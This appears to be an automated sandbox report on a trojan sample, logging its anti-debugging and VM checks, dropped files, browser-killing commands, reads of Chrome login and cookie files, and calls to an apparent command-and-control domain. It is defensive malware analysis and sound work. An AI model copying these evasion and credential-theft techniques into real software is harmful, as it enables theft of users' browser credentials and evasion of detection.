Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404306 second address: 0000000000404079 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007F47FC825387h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 000000000040407F second address: 000000000040409B instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Ch 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004040A1 second address: 00000000004040C1 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825640h 0x00000009 popad 0x0000000a popfd 0x0000000b add eax, 01h 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004040C7 second address: 00000000004040E8 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825641h 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], eax 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004040EE second address: 0000000000404109 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Eh 0x00000009 popad 0x0000000a popfd 0x0000000b pushfd 0x0000000c pushad 0x0000000d xor ecx, ecx 0x0000000f rdtsc
Uses ping.exe to sleep
Source: unknown Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_00403E2C rdtsc 0_2_00403E2C
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA,0_2_10019780
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\download_user.dll
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcp71.dll
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xldl.dll
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\atl71.dll
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\zlib1.dll
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_100204C0 0_2_100204C0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_100204C0 2_2_100204C0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe TID: 4652 Thread sleep time: -90000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe TID: 6000 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe TID: 6548 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe File opened: PhysicalDrive0
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_1001A170 FindFirstFileA,FindClose,0_2_1001A170
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_1001A170 FindFirstFileA,FindClose,2_2_1001A170
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
Source: 56BB1610C0318054.exe, 00000002.00000003.390150062.0000000003DA5000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.378507554.00000000028A6000.00000004.00000001.sdmp Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Cyfj6XGbkd.exe, 00000000.00000002.365647493.000000000088D000.00000004.00000020.sdmp, 56BB1610C0318054.exe, 00000002.00000002.413029538.00000000007E3000.00000004.00000020.sdmp, 56BB1610C0318054.exe, 00000004.00000003.371196297.00000000005A6000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: 56BB1610C0318054.exe, 00000004.00000002.377144897.000000000019B000.00000004.00000010.sdmp Binary or memory string: VMware Virtual disk 2.0
Source: 56BB1610C0318054.exe, 00000002.00000002.413029538.00000000007E3000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAWocal Area Connection* 8-QoS Packet Scheduler-0000
Source: 56BB1610C0318054.exe, 00000004.00000002.377144897.000000000019B000.00000004.00000010.sdmp Binary or memory string: VMware
Source: 56BB1610C0318054.exe, 00000002.00000002.413280132.0000000002389000.00000004.00000001.sdmp | Binary or memory string: 25-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: 56BB1610C0318054.exe, 00000002.00000002.412922141.000000000079A000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\Users\user\AppData\Roaming\1611970637183.exe | Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | Code function: 0_2_10019FF0 GetCurrentProcess, CheckRemoteDebuggerPresent
Hides threads from debuggers
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | Process queried: DebugObjectHandle
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | Process queried: DebugFlags
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | Code function: 0_2_00403E2C rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | Code function: 0_2_1001A010 IsDebuggerPresent
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | Code function: 0_2_00408D68 LoadLibraryA, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | Code function: 0_2_00404E19 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | Code function: 0_2_10019DE0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | Code function: 0_2_10019E10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | Code function: 0_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | Code function: 0_2_10019ED0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | Code function: 2_2_10019DE0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | Code function: 2_2_10019E10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | Code function: 2_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | Code function: 2_2_10019ED0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | Code function: 0_2_1000E90E GetProcessHeap, GetProcessHeap, HeapAlloc, GetVersionExA, GetProcessHeap, HeapFree, GetProcessHeap, HeapFree, __heap_term, __RTC_Initialize, GetCommandLineA, ___crtGetEnvironmentStringsA, __ioinit, __mtterm, __setargv, __setenvp, __cinit, __ioterm
Source: C:\Windows\SysWOW64\taskkill.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | Code function: 0_2_10015354 SetUnhandledExceptionFilter, __encode_pointer
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | Code function: 0_2_10015376 __decode_pointer, SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | Code function: 0_2_10018413 __NMSG_WRITE, _raise, _memset, SetUnhandledExceptionFilter, UnhandledExceptionFilter, RtlUnwind
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | Code function: 0_2_1000E44D _memset, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | Code function: 0_2_1000EFFC IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | Code function: 2_2_10015354 SetUnhandledExceptionFilter, __encode_pointer
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | Code function: 2_2_10015376 __decode_pointer, SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | Code function: 2_2_10018413 __NMSG_WRITE, _raise, _memset, SetUnhandledExceptionFilter, UnhandledExceptionFilter, RtlUnwind
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | Code function: 2_2_1000E44D _memset, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | Code function: 2_2_1000EFFC IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | Code function: 18_2_0099461F SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | Code function: 18_2_00991C57 IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | Code function: 18_2_0099631F __NMSG_WRITE, _raise, _memset, SetUnhandledExceptionFilter, UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | Code function: 18_2_0099373A _memset, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | Code function: 0_2_1001A0F0 InitializeSecurityDescriptor, SetSecurityDescriptorDacl, CreateMutexA, GetLastError
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | Code function: 0_2_1001779F cpuid
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | Code function: 0_2_10017CF0 GetLocaleInfoA
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | Code function: 2_2_10017CF0 GetLocaleInfoA
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | Code function: 18_2_00997189 GetLocaleInfoA
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | Code function: 0_2_10019780 SetupDiGetDeviceRegistryPropertyA, GetLastError, _memset, SetupDiGetDeviceRegistryPropertyA
Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | Code function: 0_2_10015254 GetSystemTimeAsFileTime, GetCurrentProcessId, GetCurrentThreadId, GetTickCount, QueryPerformanceCounter
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | Code function: 0_2_00401000 GetVersionExA, GetVersionExA, GetVersionExA, GetVersionExA
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\hihistory
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Replication Through Removable Media 1 | Windows Management Instrumentation 1 | DLL Side-Loading 1 | DLL Side-Loading 1 | Disable or Modify Tools 1 | OS Credential Dumping 1 | System Time Discovery 1 | Replication Through Removable Media 1 | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Native API 1 | Application Shimming 1 | Application Shimming 1 | Deobfuscate/Decode Files or Information 1 | Input Capture 1 | Peripheral Device Discovery 11 | Remote Desktop Protocol | Man in the Browser 1 | Exfiltration Over Bluetooth | Encrypted Channel 2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Browser Extensions 1 | Process Injection 11 | Obfuscated Files or Information 2 | Security Account Manager | File and Directory Discovery 3 | SMB/Windows Admin Shares | Data from Local System 1 | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Bootkit 1 | Logon Script (Mac) | Install Root Certificate 2 | NTDS | System Information Discovery 157 | Distributed Component Object Model | Input Capture 1 | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing 1 | LSA Secrets | Query Registry 2 | SSH | Clipboard Data 1 | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | DLL Side-Loading 1 | Cached Domain Credentials | Security Software Discovery 561 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Masquerading 1 | DCSync | Virtualization/Sandbox Evasion 13 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion 13 | Proc Filesystem | Process Discovery 3 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Process Injection 11 | /etc/passwd and /etc/shadow | Remote System Discovery 11 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Bootkit 1 | Network Sniffing | System Network Configuration Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact

Behavior Graph

[Behavior graph: ID 346134, Sample: Cyfj6XGbkd, Startdate: 29/01/2021, Architecture: WINDOWS, Score: 93]

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
Cyfj6XGbkd.exe | 40% | Virustotal |
Cyfj6XGbkd.exe | 24% | Metadefender |
Cyfj6XGbkd.exe | 59% | ReversingLabs | Win32.Trojan.Phonzy
Cyfj6XGbkd.exe | 100% | Joe Sandbox ML |

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | 24% | Metadefender |
C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | 59% | ReversingLabs | Win32.Trojan.Phonzy
C:\Users\user\AppData\Local\Temp\MSIDCDD.tmp | 0% | Metadefender |
C:\Users\user\AppData\Local\Temp\MSIDCDD.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe | 8% | Metadefender |
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | 0% | Metadefender |
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | 2% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\download\atl71.dll | 3% | Metadefender |
C:\Users\user\AppData\Local\Temp\download\atl71.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll | 3% | Metadefender |
C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\download\download_user.dll | 0% | Metadefender |
C:\Users\user\AppData\Local\Temp\download\download_user.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\download\msvcp71.dll | 0% | Metadefender |
C:\Users\user\AppData\Local\Temp\download\msvcp71.dll | 3% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\download\msvcr71.dll | 0% | Metadefender |
C:\Users\user\AppData\Local\Temp\download\msvcr71.dll | 3% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\download\zlib1.dll | 0% | Metadefender |
C:\Users\user\AppData\Local\Temp\download\zlib1.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\xldl.dll | 3% | Metadefender |
C:\Users\user\AppData\Local\Temp\xldl.dll | 0% | ReversingLabs |

Unpacked PE Files

No Antivirus matches

Domains

Source | Detection | Scanner | Label
84CFBA021A5A6662.xyz | 1% | Virustotal |
84cfba021a5a6662.xyz | 1% | Virustotal |

URLs


Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
84CFBA021A5A6662.xyz | 104.21.23.16 | true | false | | unknown
84cfba021a5a6662.xyz | 104.21.23.16 | true | false | | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://84cfba021a5a6662.xyz/info_old/g | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
http://84cfba021a5a6662.xyz/info_old/e | false | Avira URL Cloud: safe | unknown
http://84cfba021a5a6662.xyz/info_old/w | false | Avira URL Cloud: safe | unknown
http://84cfba021a5a6662.xyz/info_old/r | false | Avira URL Cloud: safe | unknown
http://84CFBA021A5A6662.xyz/info_old/ddd | false | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
                                        http://84CFBA021A5A6662.xyz/llHCyfj6XGbkd.exe, 00000000.00000002.365626550.000000000086D000.00000004.00000020.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://schemas.xmlsoap.org/soap/encoding/download_user.dll.2.drfalse
                                          high
                                          http://www.xunlei.com/GETdownload_user.dll.2.drfalse
                                            high
                                            http://www.youtube.comT56BB1610C0318054.exe, 00000004.00000003.375790359.0000000003D42000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eeeecvFEAD.tmp.9.drfalse
                                              high
                                              http://www.vb-cable.comVBCABLECyfj6XGbkd.exefalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/css/optanon.cecvFEAD.tmp.9.drfalse
                                                high
                                                https://upload.twitter.com/i/media/upload.json%dcommand=INIT&total_bytes=&media_type=image%2Fjpeg&me56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                                  high
                                                  https://www.messenger.com/origin:56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                                    high
                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=56BB1610C0318054.exe, 00000002.00000003.390709942.0000000000838000.00000004.00000001.sdmp, Localwebdata1611970646229.2.drfalse
                                                      high
                                                      http://pki.goog/gsr2/GTS1O1.crt0ecvFEAD.tmp.9.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1ecvFEAD.tmp.9.drfalse
                                                        high
                                                        https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xmlecvFEAD.tmp.9.drfalse
                                                          high
                                                          https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;gecvFEAD.tmp.9.drfalse
                                                            high
                                                            https://contextual.media.net/ecvFEAD.tmp.9.drfalse
                                                              high
                                                              http://ocsp.pki.goog/gsr202ecvFEAD.tmp.9.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.youtube.comf56BB1610C0318054.exe, 00000004.00000003.375790359.0000000003D42000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/images/cookieecvFEAD.tmp.9.drfalse
                                                                high
                                                                https://pki.goog/repository/0ecvFEAD.tmp.9.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1ecvFEAD.tmp.9.drfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://api.twitter.com/1.1/statuses/update.json56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  https://srtb.msn.com/auction?a=de-ch&b=fa1a6a09db4c4f6fbf480b78c51caf60&c=MSN&d=http%3A%2F%2Fwww.msnecvFEAD.tmp.9.drfalse
                                                                    high
                                                                    https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736ecvFEAD.tmp.9.drfalse
                                                                      high
                                                                      https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9ecvFEAD.tmp.9.drfalse
                                                                        high
                                                                        http://www.msn.com/ecvFEAD.tmp.9.drfalse
                                                                          high
                                                                          https://upload.twitter.com/i/media/upload.json56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            https://www.cloudflare.com/5xx-error-landingCyfj6XGbkd.exe, 00000000.00000002.365599254.000000000083A000.00000004.00000020.sdmp, 56BB1610C0318054.exe, 00000002.00000003.371026243.0000000003813000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000003.376084985.0000000003D38000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734ecvFEAD.tmp.9.drfalse
                                                                                high
                                                                                http://84CFBA021A5A6662.xyz/info_old/r56BB1610C0318054.exe, 00000002.00000002.413029538.00000000007E3000.00000004.00000020.sdmpfalse
                                                                                  unknown
                                                                                  https://twitter.com/compose/tweetsec-fetch-mode:56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    http://84CFBA021A5A6662.xyz/info_old/wCyfj6XGbkd.exe, 00000000.00000002.365614828.0000000000861000.00000004.00000020.sdmp, Cyfj6XGbkd.exe, 00000000.00000002.365599254.000000000083A000.00000004.00000020.sdmp, 56BB1610C0318054.exe, 00000002.00000003.409330449.0000000003D76000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000003.376093286.0000000003D4D000.00000004.00000001.sdmpfalse
                                                                                      unknown
                                                                                      http://www.vb-cable.comCyfj6XGbkd.exefalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://www.messenger.com/accept:56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804ecvFEAD.tmp.9.drfalse
                                                                                          high
                                                                                          https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3ecvFEAD.tmp.9.drfalse
                                                                                            high
                                                                                            https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.jsecvFEAD.tmp.9.drfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://contextual.media.net/48/nrrV18753.jsecvFEAD.tmp.9.drfalse
                                                                                              high
                                                                                              https://cvision.media.net/new/286x175/2/189/134/171/257b11a9-f3a3-4bb3-9298-c791f456f3d0.jpg?v=9ecvFEAD.tmp.9.drfalse
                                                                                                high
                                                                                                http://84CFBA021A5A6662.xyz/info_old/e56BB1610C0318054.exe, 00000002.00000002.413029538.00000000007E3000.00000004.00000020.sdmpfalse
                                                                                                  unknown
                                                                                                  http://crl.pki.goog/gsr2/gsr2.crl0?ecvFEAD.tmp.9.drfalse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  http://84CFBA021A5A6662.xyz/info_old/g56BB1610C0318054.exe, 00000002.00000003.391014906.0000000003D78000.00000004.00000001.sdmpfalse
                                                                                                    unknown
                                                                                                    http://pki.goog/gsr2/GTSGIAG3.crt0)ecvFEAD.tmp.9.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
